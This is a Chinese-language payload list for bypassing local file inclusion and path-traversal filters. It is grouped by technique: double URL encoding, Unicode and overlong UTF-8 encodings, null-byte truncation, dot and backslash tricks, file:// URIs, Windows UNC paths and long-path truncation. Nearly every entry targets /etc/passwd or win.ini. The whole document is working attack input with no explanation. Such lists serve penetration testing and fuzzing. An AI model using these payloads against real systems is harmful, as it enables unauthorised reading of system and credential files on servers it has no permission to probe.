# 奇葩 LFI 绕过
# 双重编码
%252e%252e%252f
%252e%252e/
..%252f
%2e%2e%2f
%2e%2e/

# 16位 Unicode
%u002e%u002e%u002f
..%u002f

# 过长 UTF-8
%c0%ae%c0%ae%c0%af
%e0%80%ae%e0%80%ae%e0%80%af
%c0%2e%c0%2e%c0%2f

# 空字节截断
../etc/passwd%00
../etc/passwd%00.jpg
../etc/passwd%00.png
../etc/passwd\x00
../etc/passwd\0

# 点绕过
....//....//etc/passwd
..../....//etc/passwd
....\/....\/etc/passwd
..;/..;/etc/passwd

# 反斜杠
..\..\..\etc\passwd
..\/..\/etc/passwd
..\/..\/..\etc/passwd

# 混合
..%5c..%5c..%5cetc/passwd
..%255c..%255c..%255cetc/passwd
..%c0%af..%c0%afetc/passwd

# 路径规范化
/etc/passwd
/etc//passwd
/etc/./passwd
/etc/../etc/passwd
/./etc/passwd
//etc//passwd

# 文件协议
file:///etc/passwd
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd
file:/etc/passwd

# UNC 路径 (Windows)
\\localhost\c$\windows\win.ini
\\127.0.0.1\c$\windows\win.ini
//localhost/c$/windows/win.ini

# 长路径截断
../../../../../../../../../../../../../../../../../etc/passwd
